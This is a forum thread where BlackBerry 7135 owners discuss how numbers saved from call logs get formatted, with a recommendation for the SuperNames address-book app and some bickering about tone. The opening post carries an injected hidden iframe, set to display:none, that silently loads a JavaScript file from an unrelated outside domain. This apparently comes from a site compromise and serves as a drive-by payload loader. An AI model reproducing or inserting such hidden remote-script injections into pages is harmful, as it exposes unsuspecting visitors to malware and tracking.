+ Reply to Thread

Interesting Situation While Saving From Call List...

Is there any way to save your calls from say the "missed call log" or "outgoing call log" without the 7135 saving the number with the area code in parenthesis?

I have over 1,000 #'s from my old Palm now in my 7135 with only hyphenation between the area codes and I do not really want to change all of them..

Any help would be greatly appreciated...

Thanks<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Questions:
    1. Why exactly do you need all your numbers in the same format? The 7135 can dial in any format (it ignores punctuation except for comma (",") and percent ("%").
    2. When saving from the call log, can you just edit the number to be in the format you want after it's in the addr book? Or do you have too many in the log to do that?

Originally posted by KLiuLess
    Questions:
    1. Why exactly do you need all your numbers in the same format? .......
    It's called OCD and I have it too. Each and every number in my address book **MUST** :BigKnife: be in the format "(123) 456-7890". Note that there must be a space between the close parenthesis and the next number.... Sorry, just thought I would share.

Byrd Dog
    You should be 10% smarter than the equipment you operate. For some of you, the 7135 is not the best choice of equipment.

Questions:
    1. Why exactly do you need all your numbers in the same format? The 7135 can dial in any format (it ignores punctuation except for comma (",") and percent ("%").
    2. When saving from the call log, can you just edit the number to be in the format you want after it's in the addr book? Or do you have too many in the log to do that?
    1. Why, because I want them to be.

2. I know that. Are you using that new thing called sarcasm? can't tell from here.

Thanks byrd dog.

Originally posted by RUYORK

2. I know that. Are you using that new thing called sarcasm? can't tell from here.

Thanks byrd dog.
    I don't think KLiuLess was being sarcastic at all, with over 568 posts here I think he's just trying to drill to the core issue. Perhaps a little gentler reply would be in order to get your answer, if not experience tells most just ignore the question... Just a little advice.

Originally posted by Kevinw
    I don't think KLiuLess was being sarcastic at all, with over 568 posts here I think he's just trying to drill to the core issue. Perhaps a little gentler reply would be in order to get your answer, if not experience tells most just ignore the question... Just a little advice.
    Thanks but I did a search on it and I guess it wasn't an issue for most.

If someone asks a question, they don't have to ask why I'm asking it....

If someone asks a question, they don't have to ask why I'm asking it....
    Hey... that happens all the time around here. When people are trying to help, sometimes more info is required (which can often result in questions being asked )... especially when the "problem" a person is trying to resolve doesn't impact on usability.
    Please visit my picture site: Robert-O-Rama :)

Re: Interesting Situation While Saving From Call List...

Is there any way to save your calls from say the "missed call log" or "outgoing call log" without the 7135 saving the number with the area code in parenthesis?

I have over 1,000 #'s from my old Palm now in my 7135 with only hyphenation between the area codes and I do not really want to change all of them..

Any help would be greatly appreciated...

Thanks
    There is an address book replacement called SuperNames 2.06 (www.standalone.com)that will format all your address book entries any way you like, regardless of the format it was initially entered in. You can setup a templates and it will display all your number in that format. This will only help you on the palm, the address book on the computer will still be in the format that they were entered in.

Hope that helps
    You should be 10% smarter than the equipment you operate. For some of you, the 7135 is not the best choice of equipment.

Re: Re: Interesting Situation While Saving From Call List...

Originally posted by Byrd Dog
    There is an address book replacement called SuperNames 2.06 (www.standalone.com)that will format all your address book entries any way you like, regardless of the format it was initially entered in. You can setup a templates and it will display all your number in that format. This will only help you on the palm, the address book on the computer will still be in the format that they were entered in.

Hope that helps
    THAT is exactly what I'm looking for.... I appreciate your help...

But, if I format everything on the 7135 to my preferences, will it overwrite the palm desktop if I choose so before a hotsync?

Robert K, I do see that happen a lot...

No, it makes absolutely no changes to the the format of the number in the Address Database itself. All the formating is done when it is displayed within Super Names (Which to me is the best address book anyway) so any of the other programs that access that database will still display it the way that it was initially entered.

SuperNames 2.06 and TAKEphONE

Does anyone know if SuperNames will work with TAKEphONE?
    Krazman - "IT MAY BE THAT YOUR PURPOSE IN LIFE IS TO SERVE AS A WARNING TO OTHERS"

Thanks byrd dog.
    No sarcasm intended. Thanks for giving me the benefit of the doubt at least.
    I ask questions to help others and myself to think through solutions. If we know exactly what you need, then we can help more effectively. Sorry, that's just the way I think.

I have OCD to some extent and like my numbers in NNN NNN NNNN format. But I don't see it as a problem to edit the number when adding the entry. I wasn't sure if you saw that as a problem... I also didn't know which format you preferred.

No sarcasm intended. Thanks for giving me the benefit of the doubt at least.
    I ask questions to help others and myself to think through solutions. If we know exactly what you need, then we can help more effectively. Sorry, that's just the way I think.

I have OCD to some extent and like my numbers in NNN NNN NNNN format. But I don't see it as a problem to edit the number when adding the entry. I wasn't sure if you saw that as a problem... I also didn't know which format you preferred.
    cool... I preferred the hyphen only because it's easier for me to read and I have been doing it that way for about 5 years now. It's kind of hard to break the habit. It's also quicker for me to enter a hyphen than parenthesis..